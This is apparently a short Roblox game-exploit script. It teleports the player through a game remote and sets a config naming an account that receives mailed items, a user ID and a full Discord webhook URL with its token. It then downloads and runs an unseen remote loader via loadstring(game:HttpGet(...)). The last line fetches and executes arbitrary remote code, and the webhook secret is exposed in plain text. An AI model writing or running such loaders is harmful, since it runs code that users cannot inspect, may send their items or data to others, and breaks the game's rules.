wait()
game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("World1Teleport"):InvokeServer()
wait()
getgenv().Config = {
    ["AutoMailUser"] = "b9zr93kaA",
    ["EquipEnchants"] = {"Huge Hunter", "Tap Power", "Lucky Eggs", "Strong Pets", "Coins", "Lucky Eggs"},
    ["UserID"] = "1276614706144215132",
    ["Webhook"] = "https://discord.com/api/webhooks/1309186012802715759/w2SfjOv5zczmRotMqC9pkOvXVonV3TktlQGejC0Rv2YylZmV9cAifHeqqxCG-TkCWPy5"
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/51034cb0788ccd3573b9fb773bf486ff.lua"))()
